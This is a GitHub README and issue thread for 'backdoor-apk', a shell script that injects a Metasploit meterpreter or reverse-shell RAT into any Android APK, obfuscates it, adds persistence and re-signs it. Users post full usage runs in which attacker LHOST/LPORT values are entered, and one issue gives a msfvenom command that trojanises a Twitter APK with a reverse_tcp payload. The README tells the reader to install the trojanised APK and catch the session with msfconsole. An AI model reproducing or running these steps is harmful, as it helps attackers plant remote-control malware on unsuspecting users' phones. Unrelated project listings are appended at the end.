backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Overview

backdoor-apk

backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.

Usage:

root@kali:~/Code/github/backdoor-apk/backdoor-apk# ./backdoor-apk.sh BaiduBrowser.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on Fri Sep 28 17:13:37 EDT 2018
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 2
[?] Please enter an LHOST value: 10.6.9.31
[?] Please enter an LPORT value: 443
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/baidu/browser/inter
[+] Smali file to hook RAT payload: com/baidu/browser/inter/BdApplication.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/baidu/browser/inter/pjese
[+] Generated new smali class name for MainBroadcastReceiver.smali: Iivym
[+] Generated new smali class name for MainService.smali: Aupyx
[+] Generated new smali class name for Payload.smali: Nwiuc
[+] Generated new smali class name for StringObfuscator.smali: Abnrw
[+] Generated new smali method name for StringObfuscator.obfuscate method: icobf
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wbcik
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Code/github/backdoor-apk/backdoor-apk#

The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc

Comments
  • apktool errors on recompilation of original APK file

    apktool errors on recompilation of original APK file

    i think the problem is apk signer [_] Generating RAT APK file...done. [+] Using payload: android/meterpreter/reverse_tcp [+] Handle the reverse connection at: 192.168.42.16:4444 [] Decompiling RAT APK file...done. [] Decompiling original APK file...done. [] Merging permissions of original and payload projects...done. [] Running proguard on RAT APK file...done. [] Decompiling obfuscated RAT APK file...done. [] Creating new directories in original project for RAT smali files...done. [] Copying RAT smali files to new directories in original project...done. [] Fixing RAT smali files...done. [] Obfuscating const-string values in RAT smali files...done. [] Locating smali file to hook in original project...done. [] Adding hook in original smali file...done. [] Adding persistence hook in original project...done. [_] Recompiling original project with backdoor...done. [!] Failed to recompile original project with backdoor

    invalid 
    opened by devrajashwin 39
  • install failed

    install failed

    hello i want install your script in kali nethunter termux android but i have one error.

    [*] Running backdoor-apk.sh v0.2.4a on Thu Dec 20 09:48:04 UTC 2018 [!] Check your environment and configuration. Couldn't find: baksmali

    Thanks for your help

    invalid 
    opened by ghost 20
  • APKTOOL ERORR : Error: Unable to rebuild apk with apktool

    APKTOOL ERORR : Error: Unable to rebuild apk with apktool

    hey guys

    help me !! >> why my apktool can't rebulld apk ??

    msfvenom -x twitter.apk -p android/meterpreter/reverse_tcp LHOST=my ip LPORT=4444 -k -o twiiterMX.apk

    Using APK template: twitter.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload [*] Creating signing key and keystore.. [*] Decompiling original APK.. [*] Decompiling payload APK.. [*] Locating hook point.. [*] Adding payload as package com.twitter.android.kpbkd [*] Loading /tmp/d20170504-3111-1bifbdj/original/smali/com/twitter/app/common/app/TwitterApplication.smali and injecting payload.. [*] Poisoning the manifest with meterpreter permissions.. [*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/> [*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/> [*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/> [*] Adding <uses-permission android:name="android.permission.SEND_SMS"/> [*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/> [*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/> [*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/> [*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/> [*] Adding <uses-permission android:name="android.permission.READ_SMS"/> [*] Rebuilding /home/moos/Downloads/twitter.apk with meterpreter injection as /tmp/d20170504-3111-1bifbdj/output.apk Error: Unable to rebuild apk with apktool

    Error: Unable to rebuild apk with apktool??!!

    invalid 
    opened by moosx 20
  • Failed to recompile original project with backdoor

    Failed to recompile original project with backdoor

    Backdoor-apk unable to recompile many apk like "Share it" , "MX Player" etc. I tried all the possible way but it is not generating apk fiel

    invalid 
    opened by EliasHridoy 19
  • Failed to locate smali file to hook in multidex APK

    Failed to locate smali file to hook in multidex APK

    I was just trying this with the Twitter APK but it didn't work:

    Console output:

    root@kali:~/android-backdoor/backdoor-apk/backdoor-apk# ./backdoor-apk.sh twitter-6-32-0.apk ________ / ______
    || _ _ || ||| || ||| AAAAAA PPPPPPP KKK KKK |||||||| AAA AAA PPP PPP KKK KKK || _ o|| (o) AAA AAA PPP PPP KKKKKK ||| || ||| AAAAAAAA PPPPPPPP KKK KKK |||||||| AAA AAA PPP KKK KKK |||| AAA AAA PPP KKK KKK /______
    ________|
    |
    _______________________________________ /____________
    |____________| Dana James Traversie

    [*] Running backdoor-apk.sh v0.1.9 on vie feb 3 16:28:59 CET 2017 [+] Android payload options:

    1. meterpreter/reverse_http 4) shell/reverse_http
    2. meterpreter/reverse_https 5) shell/reverse_https
    3. meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: 192.168.0.207 [?] Please enter an LPORT value: 7777 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Generating RAT APK file...done. [*] Decompiling RAT APK file...done. [*] Decompiling original APK file...done. [*] Merging permissions of original and payload projects...done. [*] Running proguard on RAT APK file...done. [*] Decompiling obfuscated RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Obfuscating const-string values in RAT smali files...done. [*] Locating smali file to hook in original project...done. [!] Failed to locate smali file to hook

    run.log contents: https://ghostbin.com/paste/uqh5o

    I'm going to try with a different APK just for testing Regards.

    bug 
    opened by LuisMayo 19
  • Failed recompiled original project

    Failed recompiled original project

    Very good job!

    Buy i have a problem, cant recompile the original project.

    Run.log:

    I: Using Apktool 2.1.1 I: Checking whether sources has changed... I: Smaling smali folder into classes.dex... I: Checking whether resources has changed... I: Building resources... Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_7353023048509434537.tmp, p, --forced-package-id, 127, --min-sdk-version, 9, --target-sdk-version, 15, --version-code, 64, --version-name, 4.05.28, -F, /tmp/APKTOOL4873712124946363201.tmp, -0, arsc, -0, txt, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/res, -M, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/AndroidManifest.xml] at brut.androlib.Androlib.buildResourcesFull(Androlib.java:437) at brut.androlib.Androlib.buildResources(Androlib.java:371) at brut.androlib.Androlib.build(Androlib.java:281) at brut.androlib.Androlib.build(Androlib.java:254) at brut.apktool.Main.cmdBuild(Main.java:224) at brut.apktool.Main.main(Main.java:84) Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_7353023048509434537.tmp, p, --forced-package-id, 127, --min-sdk-version, 9, --target-sdk-version, 15, --version-code, 64, --version-name, 4.05.28, -F, /tmp/APKTOOL4873712124946363201.tmp, -0, arsc, -0, txt, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/res, -M, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/AndroidManifest.xml] at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:436) at brut.androlib.Androlib.buildResourcesFull(Androlib.java:423) ... 5 more Caused by: brut.common.BrutException: could not exec: [/tmp/brut_util_Jar_7353023048509434537.tmp, p, --forced-package-id, 127, --min-sdk-version, 9, --target-sdk-version, 15, --version-code, 64, --version-name, 4.05.28, -F, /tmp/APKTOOL4873712124946363201.tmp, -0, arsc, -0, txt, -0, arsc, -I, /root/apktool/framework/1.apk, -S, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/res, -M, /root/Descargas/backdoor-apk-moar-sneaky/backdoor-apk/original/AndroidManifest.xml] at brut.util.OS.exec(OS.java:97) at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:430) ... 6 more Caused by: java.io.IOException: Cannot run program "/tmp/brut_util_Jar_7353023048509434537.tmp": error=2, No existe el fichero o el directorio at java.lang.ProcessBuilder.start(ProcessBuilder.java:1047) at brut.util.OS.exec(OS.java:90) ... 7 more Caused by: java.io.IOException: error=2, No existe el fichero o el directorio at java.lang.UNIXProcess.forkAndExec(Native Method) at java.lang.UNIXProcess.(UNIXProcess.java:187) at java.lang.ProcessImpl.start(ProcessImpl.java:130) at java.lang.ProcessBuilder.start(ProcessBuilder.java:1028) ... 8 more Forcing cleanup due to a failure or error state!

    I'm on Kali 2016.Can you help me?

    Thanks you!

    opened by JoseluACT 15
  • Failed to decompile RAT APK file when original APK is not copied to the backdoor-apk directory

    Failed to decompile RAT APK file when original APK is not copied to the backdoor-apk directory

    Whatever APK i try, i get this error:

    [*] Running backdoor-apk.sh v0.1.8 on Fri Dec 23 03:50:11 EST 2016 [+] Android payload options:

    1. meterpreter/reverse_http 4) shell/reverse_http
    2. meterpreter/reverse_https 5) shell/reverse_https
    3. meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 2 [?] Please enter an LHOST value: 192.168.1.103 [?] Please enter an LPORT value: 2525 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Generating RAT APK file...done. [*] Decompiling RAT APK file...done. [!] Failed to decompile RAT APK file

    and then it just quits!

    invalid 
    opened by BaraSec 14
  • backdoor-apk error

    backdoor-apk error "Failed to add hook"

    `1) meterpreter/reverse_http 4) shell/reverse_http 2) meterpreter/reverse_https 5) shell/reverse_https 3) meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: 52.14.61.47 [?] Please enter an LPORT value: 18120 [+] Android manifest permission options:

    1. Keep original
    2. Merge with payload and shuffle [?] Please select an Android manifest permission option: 1 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Generating RAT APK file...done. [*] Decompiling original APK file...done. [+] Keeping permissions of original project [*] Running proguard on RAT APK file...done. [*] Decompiling obfuscated RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Obfuscating const-string values in RAT smali files...done. [*] Locating smali file to hook in original project...done. [*] Adding hook in original smali file..../backdoor-apk.sh: line 85: [: too many arguments done. [!] Failed to add hook`
    bug 
    opened by steve01101 13
  • The dname extraction logic fails on some unconventional APK certs

    The dname extraction logic fails on some unconventional APK certs

    Hello, i have a problem with this:

    [!]failed to generate RSA key or also recompiling original project with backdoor, with others apk files.

    apktool version 2.20 java version 1.8.0_102 I have 32 bit libraries ia32libs both files in usr/local/bin and are executable.

    any solution?? Thanks anyway

    bug 
    opened by acordeonmorado 12
  • apktool errors on recompilation of original APK file [duplicate]

    apktool errors on recompilation of original APK file [duplicate]

    dear, i have issue in recompile original project with backdoor i always face failing in this part. even i signed one apk file and test again. but i failed as before.please help. Thank you in advance

    duplicate 
    opened by mehr66t 12
  • Failed to locate smali file to hook

    Failed to locate smali file to hook

    I tested the backdoor-apk in apk 3 and they all presented the following error: Failed to locate smali file to hook

    Running backdoor-apk.sh v0.2.0 on Tue Feb 28 11:38:14 UTC 2017 [+] Android payload options:

    1. meterpreter / reverse_http 4) shell / reverse_http
    2. meterpreter / reverse_https 5) shell / reverse_https
    3. meterpreter / reverse_tcp 6) shell / reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: leka007.ddns.net [?] Please enter an LPORT value: 4444 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Generating RAT APK file ... done. [*] Decompiling RAT APK file ... done. [*] Decompiling original APK file ... done. [*] Merging permissions of original and payload projects ... done. [*] Running proguard on RAT APK file ... done. [*] Decompiling obfuscated RAT APK file ... done. [*] Creating new directories in original project for RAT smali files ... done. [*] Copying RAT smali files to new directories in original project ... done. [*] Fixing RAT smali files ... done. [*] Obfuscating const-string values ​​in RAT smali files ... done. [*] Locating smali file to hook in original project ... done. [!] Failed to locate smali file to hook Root @ kali: ~ / backdoor-apk / backdoor-apk #

    I thought it might be apktool (v.2.2.2), then I tested the apk 3 on apktool and all worked correctly. Please help me, I have tried several solutions and none corrected the error. Why is this error appearing?

    duplicate 
    opened by Shimadzu007 10
  • Failed to locate smali file to hook

    Failed to locate smali file to hook

          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
    

    |________|________________________________ /____________
    |____________| Dana James Traversie

    [*] Running backdoor-apk.sh v0.2.4a on Mon 06 Jul 2020 04:46:49 PM IST [+] Android payload options:

    1. meterpreter/reverse_http 4) shell/reverse_http
    2. meterpreter/reverse_https 5) shell/reverse_https
    3. meterpreter/reverse_tcp 6) shell/reverse_tcp [?] Please select an Android payload option: 3 [?] Please enter an LHOST value: my ip [?] Please enter an LPORT value: port [+] Android manifest permission options:
    4. Keep original
    5. Merge with payload and shuffle [?] Please select an Android manifest permission option: 2 [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc [*] Decompiling original APK file...done. [*] Locating smali file to hook in original project...done. [!] Failed to locate smali file to hook
    bug 
    opened by alexanderajju 7
Owner
Dana James Traversie
Dana James Traversie
BlackDex is an Android unpack tool, it supports Android 5.0~12 and need not rely to any environment. BlackDex can run on any Android mobile phones or emulators, you can unpack APK File in several seconds.

BlackDex is an Android unpack tool, it supports Android 5.0~12 and need not rely to any environment. BlackDex can run on any Android mobile phones or emulators, you can unpack APK File in several seconds.

null 4.3k Jan 2, 2023
Smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation

About smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation. The syntax is loosely based on

Ben Gruver 5.7k Dec 27, 2022
This app should provide a common interface to fetch the estimated time of arrival for parcels

ETA-App This app should provide a common interface to fetch the estimated time of arrival for parcels. It will integrate with several backend systems

bring 0 Dec 14, 2021
If you have trouble pinning your custom icon to Launcher dynamically, try this library

CustomIconHelperX If you have trouble pinning your custom icon to Launcher dynam

Valentine Liao 1 Jan 4, 2022
A android app for encrypting apk

A android app for encrypting apk

FlyingYu 124 Jan 5, 2023
Black Obfuscator is an obfuscator for Android APK DexFile

Black Obfuscator is an obfuscator for Android APK DexFile, it can help developer to protect source code by control flow flattening, and make it difficult to analyze the actual program control flow.

null 581 Jan 3, 2023
Create beautiful film credit sequences—without pain.

Cinecred Create beautiful film credit sequences—without pain. Visit the website at https://loadingbyte.com/cinecred/ for further information about the

Felix Mujkanovic 7 Dec 24, 2022
log4shell detector similar to log4jscanner, log4j-detector etc but built with ProGuardCORE

Log4Shell detector Yet another log4shell detector, similar to log4jscanner, log4

James Hamilton 4 Jan 17, 2022
A program to flip every private, protected and package-private access flag to public in an Android dex file!

DexExposed A program to flip every private, protected and package-private access flag to public in an Android dex file! Building Simply run gradle mak

John Doe 2 Aug 29, 2021
Appdbg - make it possible to run android dex file in original Java Virtual Machine

Appdbg - make it possible to run android dex file in original Java Virtual Machine

null 137 Dec 20, 2022
Extract SHA-256 Certificate Fingerprint from hostname or certificate (.crt, .der or .pem) file

Certificate Fingerprint Extractor This tool extract SHA-256 Certificate Fingerprint from hostname or certificate (.crt, .der or .pem) file. In order t

Reign 1 Nov 8, 2022
Analyze any Android/Java based app or game

ClassyShark Introduction ClassyShark is a standalone binary inspection tool for Android developers. It can reliably browse any Android executable and

Google 7.2k Jan 3, 2023
MiHawk 🦅👁️ is simple and secure 🔒 Android Library to store and retrieve pair of key-value data with encryption , internally it use jetpack DataStore Preferences 💽 to store data.

MiHawk MiHawk ?? ??️ is simple and secure ?? Android Library to store and retrieve pair of key-value data with encryption , internally it use jetpack

Nedal Hasan Ibrahem 5 Sep 3, 2022
Simple API to perform AES encryption on Android. This is the Android counterpart to the AESCrypt library Ruby and Obj-C (with the same weak security defaults :( ) created by Gurpartap Singh. https://github.com/Gurpartap/aescrypt

AESCrypt-Android Simple API to perform AES encryption on Android with no dependancies. This is the Android counterpart to the AESCrypt library Ruby an

Scott Alexander-Bown 636 Dec 18, 2022
Grab’n Run, a simple and effective Java Library for Android projects to secure dynamic code loading.

Grab’n Run, a simple and effective Java Library for Android projects to secure dynamic code loading.

Luca Falsina 418 Dec 29, 2022
Android virtual machine and deobfuscator

Simplify Generic Android Deobfuscator Simplify virtually executes an app to understand its behavior and then tries to optimize the code so that it beh

Caleb Fenton 4.1k Dec 25, 2022
A Java ePub reader and parser framework for Android.

FolioReader-Android is an EPUB reader written in Java and Kotlin. Features Custom Fonts Custom Text Size Themes / Day mode / Night mode Text Highlight

FolioReader 2.1k Jan 3, 2023
A simple android app that parses its own signature and displays it

SigDisplayer Usage Download the release APK or clone the repository and compile yourself. Sign the APK with your preferred keystore. Install and open

Jonah 5 Oct 18, 2022
A program analysis tool to find cryptographic misuse in Java and Android.

A program analysis tool to find cryptographic misuse in Java and Android.

null 92 Dec 15, 2022